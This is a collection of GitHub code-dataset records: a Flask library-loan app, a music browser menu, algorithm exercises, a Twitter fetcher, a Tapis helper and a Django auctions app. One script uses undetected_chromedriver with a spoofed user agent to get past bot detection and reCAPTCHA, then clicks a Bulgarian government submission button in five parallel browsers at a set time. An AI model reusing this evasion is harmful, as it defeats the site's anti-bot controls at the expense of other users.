bookcopies.bookcopyid=loans.bookcopyid WHERE booktitle LIKE %s OR author LIKE %s;\",(searchinput, searchinput, )) \r\n result_list = connection.fetchall()\r\n\r\n\r\n return render_template (\"result.html\", result_list = result_list, staff=user)\r\n\r\n #Issue a book to a borrower. 
Physical Books can only be loaned once at a time , eBooks and Audio Books can be loaned multiple times simultaneously\r\n#staff type in book copy id and borrower id\r\n@app.route(\"/staff/issuebooks\")\r\ndef issuebooks():\r\n return render_template(\"issuebooks.html\", staff=user)\r\n\r\n#show results of issuing books and update database.\r\n@app.route( \"/staff/issuebooks_result\", methods=[\"GET\", \"POST\"])\r\ndef issuebooks_result():\r\n bookcopyid=request.form.get(\"bookid\")\r\n borrowerid=request.form.get(\"borrowerid\")\r\n todaydate = datetime.now().date()\r\n connection = getCursor()\r\n connection.execute ( \"SELECT bookcopies.bookcopyid, bookcopies.format, loans.borrowerid, loans.returned, loans.loandate From loans RIGHT JOIN bookcopies \\\r\n on loans.bookcopyid=bookcopies.bookcopyid WHERE bookcopies.bookcopyid = %s ORDER by loans.loandate DESC LIMIT 1 ;\", (bookcopyid, ) )\r\n loans= connection.fetchall()\r\n print (loans)\r\n #an if condition to test if the book is a Physical one or not\r\n if loans[0][1] == \"eBook\" or loans[0][1] == \"Audio Book\" :\r\n connection = getCursor()\r\n connection.execute ( \" INSERT INTO loans (bookcopyid, borrowerid , loandate, returned) VALUES (%s, %s,%s,0);\", (bookcopyid, borrowerid, todaydate, ) )\r\n return render_template (\"issuebook_success.html\", bookcopyid=bookcopyid, borrowerid=borrowerid, todaydate=todaydate, staff=user)\r\n\r\n elif (loans[0][1] == \"Hardcover\" or \"paperback\" or \"Illustrated\") and (loans[0][3] == 1 or loans[0][3] == None):\r\n connection = getCursor()\r\n connection.execute ( \" INSERT INTO loans (bookcopyid, borrowerid , loandate, returned) VALUES (%s, %s,%s,0);\", (bookcopyid, borrowerid, todaydate, ) )\r\n return render_template(\"issuebook_success.html\", bookcopyid=bookcopyid, borrowerid=borrowerid, todaydate=todaydate, staff=user)\r\n \r\n else:\r\n return render_template( \"issuebook_fail.html\", staff=user)\r\n\r\n\r\n#Return a book that has been on loan\r\n@app.route(\"/staff/returnbooks\")\r\ndef returnbooks():\r\n return render_template(\"returnbooks.html\", staff=user) \r\n\r\n#return results\r\n@app.route(\"/staff/returnbooks_result\", methods=[\"GET\", \"POST\"] )\r\ndef returnbooks_result():\r\n bookcopyid=request.form.get(\"bookid\")\r\n borrowerid=request.form.get(\"borrowerid\")\r\n todaydate = datetime.now().date()\r\n connection = getCursor()\r\n connection.execute ( \" UPDATE loans SET returned = 1 WHERE bookcopyid= %s AND borrowerid= %s;\", (bookcopyid, borrowerid, ))\r\n return render_template(\"return_success.html\", borrowerid=borrowerid, bookcopyid=bookcopyid, todaydate=todaydate, staff=user )\r\n\r\n\r\n# View the details of a borrower, searching by name or by borrower id.\r\n@app.route(\"/staff/borrowersearch\")\r\ndef borrowersearch():\r\n return render_template(\"borrowersearch.html\", staff=user) \r\n\r\n#show borrowe rsearch results\r\n\r\n@app.route(\"/staff/borrowersearchresult\", methods=[\"GET\", \"POST\"])\r\ndef borrowersearchresult():\r\n name=request.form.get(\"name\")\r\n namesearch = \"%\" + name + \"%\"\r\n borrowerid =request.form.get(\"borrowerid\")\r\n borroweridsearch= \"%\" + borrowerid + \"%\"\r\n connection = getCursor()\r\n \r\n \r\n if borrowerid == '':\r\n connection.execute(\"SELECT * from borrowers WHERE firstname LIKE %s OR familyname LIKE %s;\", (namesearch, namesearch, ))\r\n result_list = connection.fetchall()\r\n\r\n elif name == '':\r\n connection.execute(\"SELECT * from borrowers WHERE borrowerid LIKE %s;\", (borroweridsearch, ))\r\n 
result_list = connection.fetchall() \r\n\r\n else:\r\n connection.execute (\"SELECT * from borrowers WHERE borrowerid LIKE %s AND (familyname LIKE %s OR firstname LIKE %s);\", (borroweridsearch,namesearch, namesearch,)) \r\n result_list = connection.fetchall()\r\n \r\n \r\n return render_template (\"borrowerresult.html\", staff=user,name=name, borrowerid=borrowerid, result_list = result_list)\r\n \r\n\r\n# Update the details of a borrower\r\n@app.route(\"/staff/updateborrower\")\r\ndef updateborrower():\r\n return render_template(\"updateborrower.html\", staff=user) \r\n\r\n\r\n# get the borrower id that the staff wants to update\r\n@app.route(\"/staff/borrowerid\", methods=[\"GET\", \"POST\"])\r\ndef staffborrowerid():\r\n id=request.form.get(\"id\")\r\n connection = getCursor()\r\n connection.execute (\"SELECT * from borrowers WHERE borrowerid = %s;\", (id,) )\r\n results= connection.fetchone()\r\n print (results)\r\n\r\n return render_template(\"iddetails.html\", id=id, results=results, staff=user ) \r\n\r\n#upda information to the database\r\n@app.route(\"/staff/updateinfo\", methods=[\"GET\", \"POST\"])\r\ndef staffupdateinfo():\r\n ID=request.form.get(\"id\")\r\n Firstname=request.form.get(\"firstname\")\r\n Familyname=request.form.get(\"familyname\")\r\n Dateofbirth=request.form.get(\"dateofbirth\")\r\n Housenumbername=request.form.get(\"housenumbername\")\r\n Street=request.form.get(\"street\")\r\n Town=request.form.get(\"town\")\r\n City=request.form.get(\"city\")\r\n Postalcode=request.form.get(\"postalcode\")\r\n connection = getCursor()\r\n connection.execute ( \"UPDATE borrowers SET firstname=%s, familyname=%s,\\\r\n dateofbirth=%s, housenumbername=%s, street=%s, town=%s, \\\r\n city=%s, postalcode=%s WHERE borrowerid= %s;\" , (Firstname, Familyname, Dateofbirth,\\\r\n Housenumbername, Street, Town, City, Postalcode, ID, ))\r\n connection.execute ( \"SELECT * FROM borrowers WHERE borrowerid= %s;\" , (ID, ) )\r\n results_list = connection.fetchall()\r\n print (results_list)\r\n return render_template (\"updateconfirm.html\", ID=ID, results_list= results_list, staff=user)\r\n\r\n\r\n \r\n#Add a new borrower\r\n@app.route(\"/staff/addborrower\")\r\ndef addborrower():\r\n return render_template(\"addborrower.html\", staff=user)\r\n\r\n\r\n#get all input value from users and insert into database\r\n@app.route(\"/staff/addborrowerinfo\", methods=[\"GET\", \"POST\"])\r\ndef addborrowerinfo():\r\n Firstname=request.form.get(\"firstname\")\r\n Familyname=request.form.get(\"familyname\")\r\n Dateofbirth=request.form.get(\"dateofbirth\")\r\n Housenumbername=request.form.get(\"housenumbername\")\r\n Street=request.form.get(\"street\")\r\n Town=request.form.get(\"town\")\r\n City=request.form.get(\"city\")\r\n Postalcode=request.form.get(\"postalcode\")\r\n connection = getCursor()\r\n connection.execute ( \"INSERT INTO borrowers (firstname, familyname, dateofbirth, housenumbername, street, town, \\\r\n city, postalcode ) VALUES (%s, %s, %s, %s, %s, %s, %s, %s );\", (Firstname, Familyname, Dateofbirth,\\\r\n Housenumbername, Street, Town, City, Postalcode, ))\r\n connection.execute ( \"SELECT * from borrowers ORDER BY borrowerid DESC LIMIT 1;\")\r\n results_list = connection.fetchall()\r\n\r\n print (results_list)\r\n return render_template (\"addconfirm.html\", results_list= results_list, staff=user)\r\n\r\n@app.route(\"/staff/reports\")\r\ndef reports():\r\n return render_template (\"reports.html\", staff=user)\r\n\r\n#Display a list of all overdue books & their borrowers. 
Group all overdue books by borrower \r\n@app.route(\"/staff/overduebooks\")\r\ndef overduebooks():\r\n connection = getCursor()\r\n connection.execute ( \" SELECT borrowers.firstname, borrowers.familyname, loans.borrowerid, books.booktitle, bookcopies.bookcopyid, DATEDIFF(CURDATE(),loans.loandate) AS daysonLoan FROM borrowers \\\r\n INNER JOIN loans on loans.borrowerid=borrowers.borrowerid\\\r\n INNER JOIN bookcopies on loans.bookcopyid= bookcopies.bookcopyid \\\r\n INNER JOIN books on books.bookid=bookcopies.bookid\\\r\n WHERE loans.returned = 0 and DATEDIFF(CURDATE(),loans.loandate) >=35;\")\r\n overdue_list=connection.fetchall()\r\n print ( overdue_list) \r\n return render_template(\"overduebooks.html\", overdue_list=overdue_list, staff=user) \r\n\r\n#Display a list (Loan Summary) showing the number of times each book has been loaned in total.\r\n@app.route(\"/staff/loansummary\")\r\ndef loansummary():\r\n connection = getCursor()\r\n connection.execute (\"SELECT books.bookid, books.booktitle, COUNT(loans.loanid) FROM loans LEFT JOIN bookcopies \\\r\n ON bookcopies.bookcopyid=loans.bookcopyid INNER JOIN books ON books.bookid=bookcopies.bookid \\\r\n GROUP BY bookcopies.bookid ORDER BY COUNT(loans.loanid) DESC;\")\r\n loansummary=connection.fetchall()\r\n\r\n return render_template(\"loansummary.html\", loansummary=loansummary, staff=user) \r\n\r\n#Display a list (Borrower Summary) showing all borrowers and the number of loans (past and current combined) in total they each have had.\r\n@app.route(\"/staff/borrowersummary\")\r\ndef borrowersummary():\r\n connection = getCursor()\r\n connection.execute (\" SELECT borrowers.borrowerid, borrowers.firstname,borrowers.familyname, COUNT(loans.loanid) FROM loans LEFT JOIN borrowers \\\r\n ON borrowers.borrowerid=loans.borrowerid GROUP BY loans.borrowerid ORDER BY COUNT(loans.loanid) DESC;\")\r\n borrowersummary=connection.fetchall()\r\n return render_template(\"borrowersummary.html\", borrowersummary=borrowersummary, staff=user) \r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"SherlynDuan/636-final-library-app","sub_path":"librarywebapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32962603000","text":"#!/usr/bin/python\n#\n# Browser.py - a browser menu for a given directory\n#\n# (c) David Haworth\n\nfrom Menu import Menu, MenuThing\nfrom Config import radiopi_cfg\nimport os\n\nclass Browser(Menu):\n\tdef __init__(self, ui, lcd, eq, dir):\n\t\tMenu.__init__(self, ui, lcd, eq)\n\t\tself.things.append(MenuThing('Add all',\tself.AddAll,\tdir))\t# Might get removed later\n\t\tself.things.append(MenuThing('Back',\tself.Back,\t\t''))\n\n\t\tfiles = os.listdir(dir)\n\t\tfiles.sort()\n\n\t\t# Add directories first\n\t\tfor f in files:\n\t\t\tff = os.path.join(dir, f)\n\t\t\tif os.path.isdir(ff):\n\t\t\t\tself.things.append(MenuThing(f,\tself.DirAction,\tff))\n\n\t\t# Add playable files. 
Ignore all others\n\t\tnPlayable = 0\n\t\tfor f in files:\n\t\t\tff = os.path.join(dir, f)\n\t\t\tif self.IsPlayable(ff):\n\t\t\t\tnPlayable += 1\n\t\t\t\tself.things.append(MenuThing(f,\tself.FileAction, ff))\n\n\t\t# If there are no playable files, remove the Add All option.\n\t\tif nPlayable == 0:\n\t\t\tself.things.pop(0)\n\n\t# MPD appears to trigger an exception for non-playable files (CommandError) so for\n\t# the moment we only check if it's a file.\n\t# WARNING: the add command claims to be recursive for directories, but appears not to work.\n\tdef IsPlayable(self, f):\n\t\t(n,e) = os.path.splitext(f.lower())\n\t\treturn os.path.isfile(f) and e in radiopi_cfg.music_sfx\n\n\t# Add all the playable files in the MenuThing's directory\n\tdef AddAll(self, mt, evt):\n\t\tif evt == 'ok':\n\t\t\tself.eq.PutEvent(\"add \" + mt.data)\n\t\t\tself.Ack()\n\t\t\treturn True\n\t\treturn False\n\n\tdef DirAction(self, mt, evt):\n\t\tif evt == 'red':\n\t\t\treturn self.AddAll(mt, 'ok')\n\t\telif evt == 'ok' or evt == 'right':\n\t\t\tself.ui.EnterBrowser(mt.data)\n\t\t\treturn True\n\t\treturn False\n\n\tdef FileAction(self, mt, evt):\n\t\tif evt == 'ok':\n\t\t\tself.eq.PutEvent(\"add \" + mt.data)\n\t\t\tself.Ack()\n\t\t\treturn True\n\t\treturn False\n","repo_name":"TheLancashireman/RadioPi","sub_path":"controller/Browser.py","file_name":"Browser.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74733538170","text":"# Comment it before submitting\n# class Node:\n# def __init__(self, value, left=None, right=None):\n# self.value = value\n# self.right = right\n# self.left = left\n\n\ndef tree_len(Node):\n if Node.left is None and Node.right is None:\n return 1\n\n left_len = 0\n if Node.left is not None:\n left_len = tree_len(Node.left)\n\n right_len = 0\n if Node.right is not None:\n right_len = tree_len(Node.right)\n\n return 1 + max(left_len, right_len)\n\n\ndef solution(Node) -> bool:\n balanced = True\n\n if Node is None:\n return balanced\n\n if (Node.left is None) and (Node.right is None):\n return balanced\n\n left_len = 0\n if Node.left is not None:\n left_len = tree_len(Node.left)\n\n right_len = 0\n if Node.right is not None:\n right_len = tree_len(Node.right)\n\n diff = left_len - right_len\n\n if abs(diff) <= 1 and solution(Node.right) is True and solution(Node.left) is True:\n return True\n\n return False\n","repo_name":"DimaZzZz101/Yandex_Practicum_Algorithms","sub_path":"Sprint_5/Practice/B/balansed_tree.py","file_name":"balansed_tree.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37469186960","text":"import numpy as np\n\n#Function enumerating gauss elimination's two steps\ndef gauss_elimination(a,n):\n x = forward_elimination(a,n)\n print(\"Final\")\n print(a)\n if x!=-1:\n print(\"Singular matrix\")\n if a[x,n]!=0:\n print(\"Inconsistent solution\")\n else:\n print(\"Infinite solutions\")\n back_substitution(a,n)\n\n#Function to swap two rows\ndef swap(a,n,i,j):\n for k in range(n+1):\n temp = a[i,k]\n a[i,k] = a[j,k]\n a[j,k] = temp\n\n#Function to perform forward elimination\ndef forward_elimination(a,n):\n for k in range(n):\n index = k\n value = a[index,k]\n \n for i in range(k+1,n):\n if int(a[i,k])>value:\n index = i\n value = a[i,k]\n \n if a[k,index]==0: #singular matrix\n return k\n \n if index!=k:\n swap(a,n,k,index)\n \n for i in range(k+1,n):\n r = 
a[i,k]/a[k,k]\n for j in range(k+1,n+1):\n a[i,j] = a[i,j]-a[k,j]*r\n a[i,k]=0\n print(a)\n return -1\n\n#Function to perform backward substitution and find the x values\ndef back_substitution(a,n):\n solution = np.zeros((n))\n for i in range(n-1,-1,-1):\n solution[i]=a[i,n]\n for j in range(i+1,n):\n solution[i] = solution[i] - a[i,j]*solution[j]\n solution[i] = solution[i]/a[i,i]\n print(solution)\n \n#Taking user input of the size of square matrix\nn=int(input(\"Number of rows (=columns) : \"))\n\n#Initialising the augmented matrix for AX=B\na= np.zeros((n,n+1))\n\n#User input of Augmented matrix entries\nprint('Enter Augmented Matrix Coefficients:')\nfor i in range(n):\n for j in range(n+1):\n a[i][j] = int(input( 'a['+str(i)+']['+ str(j)+']='))\n\ngauss_elimination(a,n)","repo_name":"Srinidi-V/Scientific-Computing","sub_path":"Solving_Linear_Equations/gaussElimination.py","file_name":"gaussElimination.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27535490406","text":"import torch\r\n\r\n# the filename of the output trained model features\r\nmodel_name = \"train_model_features.pt\"\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# size of the embedding output and input for lstm\r\ninput_size = 65\r\n\r\n# the number of hidden nodes in the LSTM model\r\nhidden_size = 512\r\n\r\n# max length of the output string during Sampling\r\nmax_seg_length = 30\r\n","repo_name":"philgookang/simple_bilstm_model","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22849642077","text":"from calculate_distance import haversine_distance \nimport csv\nimport numpy as np\n\n\n#レビュー数を読み込みこむ\nreview_num_path = \"data\\\\number_of_review\\\\岡山_numOfRview.csv\"\nwith open(review_num_path,\"r\",encoding=\"utf-8\") as f_r:\n reader = csv.reader(f_r)\n spot_and_numOfrev = {row[0]: int(row[1]) for row in reader}\nmax_review_num = max(spot_and_numOfrev.values())\n\n\n#スコアが高いtop nスポットのスポットを返却\n#spots_info = [[spot_name_1, [lat_1,lng_1], [aspects_1],[asp_vectors_1],[cluster_vectors_1],[spots_aspectsVector_float_1],spot_numOfRev], ... 
]\n#形式は[[spot_name,[lat,lng],aspects,score], ...]\ndef return_spot(selected_lat, selected_lng, recommend_range, selected_aspect_list, spots_info,n):\n recommend_spots_info = []\n for spot_info in spots_info:\n sn = spot_info[0]\n lat = spot_info[1][0]\n lng = spot_info[1][1]\n aspect_list = spot_info[2]\n asp_vec_list = spot_info[3]\n cluster_vec_list = spot_info[4]\n spots_aspectsVector = spot_info[5]\n spot_numOfRev = spot_info[6]\n if haversine_distance(selected_lat,selected_lng,lat,lng) <= recommend_range:\n score = calc_spot_score(selected_aspect_list, spots_aspectsVector, spot_numOfRev)\n recommend_spots_info.append([sn,[lat,lng],aspect_list,score])\n sorted_recommend_spots_info = sorted(recommend_spots_info, key = lambda x:x[-1],reverse=True)\n if len(sorted_recommend_spots_info) <= n:\n print(\"return_spot : \" ,sorted_recommend_spots_info)\n return sorted_recommend_spots_info\n else:\n print(\"return_spot : \" ,sorted_recommend_spots_info[0:n])\n return sorted_recommend_spots_info[0:n]\n\ndef cos_sim(v1, v2):\n if v1 != [0.0]*len(v1) and v2 != [0.0]*len(v2) :\n return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n else:\n return 0.0\ndef return_selected_aspectsVector(selected_aspect_list):\n read_clustering_path = \"data\\\\all_aspect_clustering\\\\岡山aspect_clustering_result.csv\"\n #全ての観点のクラスタリング結果から、選択した観点のベクトルを生成\n list_aspects = []\n with open(read_clustering_path, 'r', newline='', encoding='utf-8') as csvfile:\n csv_reader = csv.reader(csvfile)\n for row in csv_reader:\n # 各行の要素数を取得\n list_aspects.append(row[1:])\n selected_aspectsVector = [0.0]*len(list_aspects)\n for index in range(len(list_aspects)):\n for selected_aspect in selected_aspect_list:\n if selected_aspect in list_aspects[index]:\n selected_aspectsVector[index] += 1\n return selected_aspectsVector\n\n\ndef calc_spot_score(selected_aspect_list, spots_aspectsVector, spot_numOfRev):\n score = 0.0\n selected_aspectsVector = return_selected_aspectsVector(selected_aspect_list)\n similarity = cos_sim(selected_aspectsVector,spots_aspectsVector)\n if spot_numOfRev != None:\n popularity = spot_numOfRev/max_review_num\n score = popularity * similarity\n return score\n","repo_name":"RAnu-0512/recommend_travel","sub_path":"return_spot.py","file_name":"return_spot.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41828466458","text":"# usage: python get_english_1M.py \r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport pandas as pd\r\nimport numpy as np\r\nimport utils.twitter_api\r\nfrom twitter.error import TwitterError\r\nimport click\r\n\r\n\r\npairs_re = re.compile(r'([a-z ]+)=([A-Za-z0-9 ]+)')\r\n\r\ndef get_tweet(row):\r\n id = row['TweetID']\r\n try:\r\n tweet = utils.twitter_api.api.GetStatus(id)\r\n print('retrieving tweet for ID %d' % int(id))\r\n return tweet\r\n except TwitterError:\r\n return np.NaN\r\n\r\n\r\ndef load_data():\r\n dfs = []\r\n with open(tsv) as infile:\r\n df = pd.DataFrame([dict(pairs_re.findall(l)) for l in infile])\r\n df = df.rename(columns={'id': 'TweetID'})\r\n df.to_csv(tsv + '.csv', encoding='utf-8')\r\n\r\n return df\r\n\r\n\r\ndef get_info(s):\r\n try:\r\n fields = {'Text': s.text, 'Retweeted': s.retweeted, 'Handle': s.user.screen_name}\r\n except AttributeError:\r\n fields = {'Text': np.NaN, 'Retweeted': np.NaN, 'Handle': np.NaN}\r\n\r\n return pd.Series(fields)\r\n\r\n\r\ndef populate_tweets(df, output_dir):\r\n split_dfs = np.array_split(df, 450) # split 
dataframe into 450 chunks\r\n for i, df_chunk in enumerate(split_dfs):\r\n status = df_chunk.apply(get_tweet, axis=1)\r\n new = status.apply(get_info)\r\n result = pd.concat([df_chunk, new], axis=1)\r\n # save result to disk\r\n outfile = os.path.join(output_dir, 'English_1M_%d.csv' % i)\r\n result.to_csv('English_1M_%d.csv' % i, encoding='utf-8')\r\n\r\n\r\n\r\n@click.command()\r\n@click.option('--tsv', default='English_1M.tsv', help='The .tsv file from Volkova, Wilson, & Yarowsky (2013).')\r\n@click.option('--output_dir', help='The output folder to store the bunch of .csv files containing the tweets.')\r\ndef command(**kwargs):\r\n data = load_data(tsv)\r\n populate_tweets(data, output_dir)\r\n\r\nif __name__ == '__main__':\r\n command()\r\n","repo_name":"schan27/twitter-capitalization","sub_path":"data/get_english_1M.py","file_name":"get_english_1M.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39068531781","text":"import os\nimport string\nimport sys\nimport json\n\nfrom tapipy.tapis import Tapis\n\nINSTANCE = os.environ.get(\"INSTANCE\")\nTENANT = os.environ.get(\"TENANT\")\ntapis_service_token = os.environ.get(\"TAPIS_SERVICE_TOKEN\")\nbase_url = os.environ.get(\"AGAVE_BASE_URL\", \"https://api.tacc.utexas.edu\")\ntapis_base_url = os.environ.get(\"TAPIS_BASE_URL\", \"https://tacc.tapis.io\")\nv2_token_url = os.environ.get(\"V2_TOKEN_URL\", \"https://tacc.develop.tapis.io/v3/oauth2/v2/token\")\ndatabase = os.environ.get(\"TAPIS_DATABASE\")\ncollection = os.environ.get(\"TAPIS_COLLECTION\")\n\nif not tapis_service_token:\n raise Exception(\"Missing TAPIS_SERVICE_TOKEN configuration.\")\n\n\ndef get_config_metadata_name():\n \"\"\"Return name of config metadata\"\"\"\n return f\"config.{TENANT}.{INSTANCE}.jhub\"\n\n\ndef get_tenant_configs():\n \"\"\"Retrive tenant config from metadata\"\"\"\n t = Tapis(base_url=tapis_base_url, jwt=tapis_service_token)\n q = {\"name\": get_config_metadata_name()}\n print(f\"tenant query: {q}\")\n metadata = json.loads(\n t.meta.listDocuments(db=database, collection=collection, filter=json.dumps(q))\n )[0][\"value\"]\n return metadata\n\n\ndef get_user_configs(username):\n \"\"\"Retrieve any groups user belongs to\"\"\"\n t = Tapis(base_url=tapis_base_url, jwt=tapis_service_token)\n q = {\"value.user\": username, \"value.tenant\": TENANT, \"value.instance\": INSTANCE}\n print(f\"user query: {q}\")\n metadata = json.loads(\n t.meta.listDocuments(db=database, collection=collection, filter=json.dumps(q))\n )\n return metadata\n\n\ndef safe_string(\n to_escape, safe=None, escape_char=\"-\"\n):\n \"\"\"Escape a string so that it only contains characters in a safe set.\n Characters outside the safe list will be escaped with _%x_,\n where %x is the hex value of the character.\n \"\"\"\n if safe is None:\n safe = set(string.ascii_lowercase + string.digits)\n chars = []\n for c in to_escape:\n if c in safe:\n chars.append(c)\n else:\n chars.append(_escape_char(c, escape_char))\n return \"\".join(chars)\n\n\nif sys.version_info >= (3,):\n\n def _ord(byte):\n return byte\n\n\nelse:\n _ord = ord\n\n\ndef _escape_char(c, escape_char):\n \"\"\"Escape a single character\"\"\"\n buf = []\n for byte in c.encode(\"utf8\"):\n buf.append(escape_char)\n buf.append(f\"{_ord(byte)}\")\n return 
\"\".join(buf)\n","repo_name":"scinco-project/jhub","sub_path":"jupyterhub/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9971240248","text":"\"\"\"\r\n067\r\nFaça um programa que mostre a tabuada de vários numeroes, um de cada vez, para cada valor digitado\r\nO programa será interrompido quando o número solicitado for negativo.\r\n\"\"\"\r\n\r\ndef tabuada (num):\r\n for i in range(11):\r\n x = num * i\r\n output = str(num) + \" X \" + str(i) + \" = \" + str(x)\r\n print(\"{:^25}\".format(output))\r\n #print(\"{:<2} X {:>2} = {:>3}\".format(num, i, x))\r\n\r\n\r\n\r\nwhile True:\r\n n = int(input(\"Digite um numero: \"))\r\n if n < 0:\r\n break\r\n texto = \"Tabuada de \" + str(n)\r\n print(\"{:=^25}\".format(texto))\r\n tabuada(n)\r\n print(\"=\"*25)","repo_name":"vitorsemidio-dev/curso-python-guanabara","sub_path":"Desafios/Aula 015/ex067.py","file_name":"ex067.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4627095192","text":"import os\nimport time\nimport threading\nimport undetected_chromedriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom concurrent.futures import ThreadPoolExecutor\nimport csv\n\n\ndef get_undetected_chromedriver():\n # Обход защиты\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\n '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36')\n\n chrome_options.add_argument('--disable-blink-features=AutomationControlled')\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--start-maximized\")\n # chrome_options.add_argument('--headless')\n \"\"\"Проба\"\"\"\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--disable-setuid-sandbox\")\n\n\n driver = undetected_chromedriver.Chrome()\n\n return driver\n\n\ndef open_url():\n url = \"https://publicbg.mjs.bg/BgSubmissionDoc\"\n driver = get_undetected_chromedriver()\n driver.maximize_window()\n driver.get(url)\n next_button = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')))\n start_button = driver.find_element(By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')\n driver.execute_script(\"window.scrollBy(0,document.body.scrollHeight)\")\n return driver\n\ndef click_start_button():\n while True:\n now = time.localtime()\n if now.tm_hour == 11 and now.tm_min == 59 and now.tm_sec == 59: # and now.tm_msec == 800: в милисекундах\n for driver in drivers:\n start_button = driver.find_element(By.XPATH, '//input[@class=\"btn btn-default g-recaptcha\"]')\n start_button.click()\n break\n time.sleep(1)\n\n# Создание и запуск 5 потоков\ndrivers = []\nfor i in range(5):\n driver = open_url()\n drivers.append(driver)\n t = threading.Thread(target=driver)\n t.start()\n\n# Запуск потока для нажатия на кнопку \"start_button\" в 11:59:59\nt = 
threading.Thread(target=click_start_button)\nt.start()","repo_name":"SashaZt/scrap_tutorial-master","sub_path":"Bulgaria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31458895750","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom .models import User\nfrom .models import AuctionListing\nfrom .models import Bid\nfrom .models import Comment\n\nfrom .utils import get_highest_bid\n\nclass CreateListingForm(forms.Form):\n title = forms.CharField(label=\"Title\", max_length=64)\n description = forms.CharField(label=\"Description\", max_length=256)\n starting_bid = forms.DecimalField(decimal_places=2)\n image = forms.URLField(required=False)\n category = forms.CharField(label=\"Category\", max_length=64, required=False)\n \nclass BidOnItemForm(forms.Form):\n bid = forms.DecimalField(decimal_places=2)\n\nclass CommentForm(forms.Form):\n content = forms.CharField(label=\"leave a comment\", max_length=256, widget=forms.Textarea)\n\ndef index(request):\n listings = AuctionListing.objects.values(\"title\",\n \"description\",\n \"image\",\n \"category\")\n listings_list = [entry for entry in listings]\n\n for i, price in enumerate(AuctionListing.objects.values(\"starting_bid\")):\n listings_list[i][\"highest_bid\"] = round(get_highest_bid(listings_list[i][\"title\"]).amount / 100, 2)\n\n for i, active in enumerate(AuctionListing.objects.values(\"winner\")):\n listings_list[i][\"closed\"] = AuctionListing.objects.get(title=listings_list[i][\"title\"]).winner is not None\n\n return render(request, \"auctions/index.html\", {\n \"listings\": listings_list \n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n if request.method == \"POST\":\n title 
